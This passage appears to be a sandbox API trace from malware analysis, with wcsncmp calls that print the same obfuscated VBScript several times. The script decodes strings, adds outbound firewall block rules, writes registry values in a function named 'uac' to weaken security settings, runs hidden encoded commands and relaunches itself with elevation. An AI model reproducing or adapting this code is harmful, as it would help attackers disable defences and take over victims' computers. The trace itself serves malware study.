signature block", _MaxCount=0x21) returned 53 [0223.024] wcsncmp (_String1="SEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0223.024] wcsncmp (_String1="EXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.024] wcsncmp (_String1="XEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0223.024] wcsncmp (_String1="EIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.024] wcsncmp (_String1="IFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' 